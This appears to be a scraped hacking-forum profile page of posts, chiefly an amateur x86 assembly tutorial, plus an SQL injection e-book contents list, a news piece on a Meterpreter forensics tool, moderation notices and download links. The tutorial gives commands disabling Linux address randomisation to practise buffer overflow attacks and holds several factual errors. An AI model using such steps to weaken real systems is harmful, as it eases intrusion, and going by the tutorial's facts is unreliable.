    Assembly Language Basics Tutorial ------------------------------------- By Aro *Intro: Hey it's Aro and this is my first tutorial. In this basic assembly tutorial shows basics things you need to know. I had this Idea that there is other people like me who are still learning and want someone to learn with to I made this tutorial for people to learn along with me so we can all spread information. If anyone who knows about assembly please correct if there is anything wrong in my tutorial. I need feedback it will let me know what I need to do to be better. Hope you like it Aro. This tutorial contains the following information: *System Organization Basics *CPU *CPU Registers *Stack System Organization Basics: -------------------------------------------------------------------------------------------------- CPU (aka Central Processing Unit): ------------------------------------------------------------------------------------------------------ *Control Unit: Retrieve/Decode instructions,Retrieve / Storeage data in memory. *Execution Unit: Acually Exectution of instruction. *Register: Internal memory locations used as variables. *Flags: Used to indicate various "event" when exectution is happening. CPU Registers: ------------------------------------------------------------------------------------------------------------------------------------------------- Registers are internal memory locations used as variables. A register is 32 bits long or 4 bytes there are 8 registers. EAX, EBX, ECX, EDX, ESI, EDI, ESP, and EBP. The "E" in the beginning of all the registers indicates that it is a 32 bit register. General Purpose Registers -------------------------------------------------------------------------------------- *EAX (Accumulator Register) : General used for storing operands and result data *EBX (Base Register): Used for storing pointers to data. Only register that can be used as an index *ECX (Counter Register): Used for loop operations. *EDX (Data Register): Used as a input outup pointer. *ESI, EDI (Pointer)- Data Pointer Registers from memory operations, generally used for string operations. *ESP (Pointer): Stack Pointer Register. *EBP (Pointer): Stack Data Pointer Register. 32 bit registers can be split into 16 bit. In 16 bit programs only the lowest bits of the registers are used. They have the same names as general registers but without the "E" example: AX, EX, CX, DX, SI, DI, SP, BP. The 16 bit register can be spit into highbyte and lowbyte. example: EAX is 32 bit, AX is the lowest 16 bit of EAX and then the AX could be split into AH (highbyte) and AL (lowbyte) which are one byte in size. Segment Registers -------------------------------------------------------------------------------------- *CS (Code segment) - 16 bit number that points to a active code-segment *DS (Data segment) - 16 bit number that points to a active data-segment *SS (Stack segment - 16 bit number that points to a active stack-segment *ES (Extra segment) - 16 bit number that points to a active extra segment *EIP (32 bit intruction pointer) points to the instruction being done. *A control register is a processor register which changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control. Check http://en.wikipedia.org/wiki/Control_register for more information. Virtual Memory Model: Every process is laid out in the same virtual memory space, it doesn't matter what the the actual memory location. Every process that runs in the system seems like its running independently. There is a security feature in Linux 2.6 and higher that's called "randomize_va_space" this feature protects against Buffer Overflows. randomize_va_space uses space randomization if enabled to 1 (true), which is default to disable it change it to 0 (false). This will be helpful to practice on buffer overflows. If you have windows don't do this though I recommend you to get Linux such as Ubuntu (even a live CD) it would help if you really want to get good at this. But if you want to get a dissembler get NASM for windows. To disable the linux patch(Only do the stuff above if you want or going to practice doing buffer overflow attacks): cat/proc/sys/kernel/randomize_va_space echo 0 > /proc/sys/kernel/randomize_va_space cat /proc/sys/kernel/randomize_va_space Only do the stuff above if you want or going to practice doing buffer overflow attacks.^^^ Program Memory: -------------------------------------------------------------------------------------------- *The first segment is the .text segment. This segment cotains the actual program the execuable instructions are located here. *The second segment is the .data. This is where any data that has been initalized with a value is held. example: .data Int32: .int 2 *The third segment is the .bss. This is where unused data is held. example: .bss .comm Buffer, 1024 *The third segment is the heap. The heap is where the virtual memory space is located. *The fourth segment is just unused memory. *The firth segment is the Stack which is general used for storing function arguments and local variables. The stack is located in the highest memory location possible. It general goes down the memory from highest to lowest memory. The stack is last in first out data structure otherwise know as a LIFO (Last in First Out). The Stack ------------------------------------------------------------------------------------------------------------------------- As I said before. A stack is a temporary storage unit in computer memory where function arguments and local variables are stored. The LIFO Principle is last value you put in the first it comes out. Just imagine you have a stack of papers when I wanted my teach to correct my test first I would wait until everybody finished so when I put in my test on her desk I can sneak a peek on my score or how many red marks are on my test when she starts correcting it when we walk out of class. When you PUSH two values on the stack you will get the last one first because of that method. PUSH - pushes value on stack POP - removes from stack ESP - Points to stack Example of LIFO Principle REMEMBER MUST KNOW LIFO: Right here is a example of a stack. The ESP register holds 0x000008 which is the top of the stack. example: ESP 0x0000008 The stack adds a new value (0x0000007) and (0x0000006) using the PUSH operation. example: PUSH 0x0000007 PUSH 0x0000006 Now we update the ESP pointer to the top of the stack to the address 0x00000006. example: ESP 0x0000006 Now we use the POP operation to take that value of the stack. Which removes that last operation put into the stack (LIFO REMEMBER). example: POP 0x00000006 Next we have to update the ESP pointer to value 0x0000007. example: ESP 0x00000007 Next we have to POP the last first value we put in off the stack. (LIFO) example: POP 0x00000007 Finally we update the ESP pointer register to the top of the stack. example: ESP 0x0000008 Now I hope you understand the LIFO Principle if you don't, leave a question. Or Google.com its the best hacking site. If you don't understand or I explained something wrong leave a message. Someone who knows Assembly or I will hopefully answer. I'll write part two later. Please leave feed back good or bad. I don't care. I need to get better. Assembly Language Basics Tutorial Aro Out
  17. Nytro
    E-Book Table of Contents [Abstract]...........................................................................................................................3 [Introduction].....................................................................................................................3 [Obtaining Information Using Error Messages].................................................................7 [Leveraging Further Access].............................................................................................12 [xp_cmdshell]...............................................................................................................12 [xp_regread]..................................................................................................................13 [Other Extended Stored Procedures]............................................................................13 [Linked Servers]............................................................................................................14 [Custom extended stored procedures]...........................................................................14 [Importing text files into tables]...................................................................................15 [Creating Text Files using BCP]...................................................................................15 [ActiveX automation scripts in SQL Server]................................................................15 [Stored Procedures]...........................................................................................................17 [Advanced SQL Injection]................................................................................................18 [Strings without quotes]................................................................................................18 [Second-Order SQL Injection]......................................................................................18 [Length Limits].............................................................................................................20 [Audit Evasion].............................................................................................................21 [Defences]........................................................................................................................21 [Input Validation]..........................................................................................................21 [SQL Server Lockdown]...............................................................................................23 [References].....................................................................................................................24 Appendix A - 'SQLCrack'.................................................................................................25 (sqlcrack.sql).................................................................................................................25 Download: http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
  18. Nytro
    Researchers will release an open source tool at Black Hat USA that helps forensics investigators reconstruct attacks that use a popular Metasploit payload to covers its tracks. Mandiant's Steve Davis and Peter Silberman have developed an "anti-" anti-forensics tool, of sorts, tentatively called the Metasploit Forensics Framework, which they'll demonstrate at the security conference later this month. The tool is aimed at unmasking what Metasploit's stealthy Meterpreter (PDF) did on a machine. Meterpreter lets developers write code in DLL files and execute everything in memory -- without writing anything to the victim machine's disk, where it could be detected and, in turn, complicate incident response. Meterpreter can be used to download and upload files, execute code, and open its own command shell, the researchers say. Their new tool can tell if a Meterpreter packet is still in memory, and, if so, which files Meterpreter has accessed, and whether it has modified a registry key. Some traditional antivirus tools can't detect Meterpreter-borne attacks because they never hit the disk, the researchers say. "You wouldn't see the attacks happen if they didn't write anything to disk," says Steve Davis, one of the researchers and a consultant with Mandiant. "We are going to show how we can reconstruct a crime scene in memory." The Metasploit Forensics Framework is a proof-of-concept tool that scans the processes in memory. "Meterpreter has unique packets...and we can identify those and reconstruct its processes," says Peter Silberman, an engineer on the product team at Mandiant. "We're going to discuss how Meterpreter looks in memory, and how it's able to circumvent traditional tools [for forensics]. We'll demonstrate how with some advanced knowledge, you can reconstruct what commands were sent to Meterpreter and perform an autopsy on an attack." Memory analysis in forensics has only begun to catch on tool-wise in the past year or so, the researchers say. Their tool helps investigators pull useful information from memory to help in their forensics work, they say. "This is just a small research project in how freed memory can still pull out a lot of useful information on the commands [an attacker] used," for example, Silberman says. The researchers say they fully expect the Metasploit developers to come up with a workaround for their tool in short order once it's released. They plan to make the tool available on Mandiant's Website the day of their Black Hat presentation so attendees can experiment with it during their talk, they say.
  19. Nytro
    O sa ajungi un criminal... Ban!
  20. Nytro
    Pot face eu un tool ceva, numai sa imi dati idei. A, si sa nu fie mult de munca la el, ma plictisesc repede.
  21. Nytro
    Cat am mai cautat dupa unul functional... Cred ca merge bine. Download: http://www.freeproxy.ru/download/P_Checker.exe
  22. Nytro
    Daca e cel care il stiu eu, nu imi place. Adica e veche faza cu macrourile. Si in 95% din cazuri nu o sa mearga. S-ar putea face multe daca ar merge...
  23. Nytro
    Voi reincepe campania cu warningurile. Veti primi warning daca: - inviati un topic vechi fara rost - Uitati-va si voi la data ultimului post - postati ID-ul vostru - Discutiile se poarta pe forum - postat in categorii gresite - Ganditi putin inainte de a deschide un topic si selectati categoria potrivita. Toate cererile sunt la CERERI, nu la Programe Hack sau altundeva. De asemenea vechile motive pentru avertismente se pastreaza, in special offtopicul. La 3 warnuri ban o saptamana, depinde de starea in care ma aflu. Nu va convine ceva va dati cu curu de pamant.
  24. Nytro

    phpbb3?

    Nytro replied to kw3rln's topic in Anunturi importante

    Ban. Uitate la datele ultimelor posturi.
  25. Nytro
    Download: http://www.2shared.com/file/7084370/1c5af5a1/BOF.html
×
×
  • Create New...